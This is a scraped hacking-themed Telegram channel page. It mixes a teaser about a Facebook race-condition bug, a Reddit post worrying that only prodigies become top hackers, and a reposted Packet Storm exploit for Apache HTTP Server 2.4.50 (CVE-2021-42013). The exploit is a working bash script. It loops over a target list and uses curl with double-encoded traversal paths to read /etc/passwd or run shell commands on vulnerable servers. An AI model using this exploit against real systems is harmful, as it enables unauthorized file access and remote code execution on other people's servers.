Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Finding and exploiting race condition vulnerability on facebook server

Finding bugs on facebook was one of the biggest dream of my life. when i read this blog 2014 and later this in 2019. If you are not…Continue reading on Medium »
Read more...
hacking: security in practice
Is being a best hacker for prodigies, Ivy league graduates in CS and Naturally smart people. Do normal humans have chance?

It's unfair, that no best hacker exists who is just a normal guy like me. I have below average intellect, I am 23 years old and I know, I won't be a best hacker, despite I spent next 10 years.

I lost in genetic lottery, didn't start young and neither from tech field.

Every best hacker, I have read about falls into 3 categories.

1.
He started very early and was a prodigy. Marcus Hutchins is a hacker who reverse engineered Zeus malware. He started young and has extremely high IQ. Also there are many others who start young.

2.
They graduated from Ivy league schools. They have rich parents, high intellect and natural talent.

3.
They are IQ genuises. They have IQs above 140 and are naturally smart. They can master any language and can think out of box
submitted by /u/Good-Bottle7238
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Apache HTTP Server 2.4.50 Path Traversal / Code Execution

https://2.bp.blogspot.com/-weqZA-ftzQE/WWlvbeJCv3I/AAAAAAAAIPM/_poAex3uv6ENktRwTJkjqdNNBZYRKBnvQCLcBGAs/s1600/h74.png
Apache HTTP Server version 2.4.50 suffers from path traversal and code execution vulnerabilities.

MD5 | 83e881b06b8c45b03c0e1280bba0e9df

Download
# Exploit: Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)
# Date: 10/05/2021
# Exploit Author: Lucas Souza https://lsass.io
# Vendor Homepage: https://apache.org/
# Version: 2.4.50
# Tested on: 2.4.50
# CVE : CVE-2021-42013
# Credits: Ash Daulton and the cPanel Security Team

#!/bin/bash

if [[ $1 == '' ]]; [[ $2 == '' ]]; then
echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
echo ./PoC.sh targets.txt /etc/passwd
echo ./PoC.sh targets.txt /bin/sh id

exit
fi
for host in $(cat $1); do
echo $host
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/$2"; done

# PoC.sh targets.txt /etc/passwd
# PoC.sh targets.txt /bin/sh whoami


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video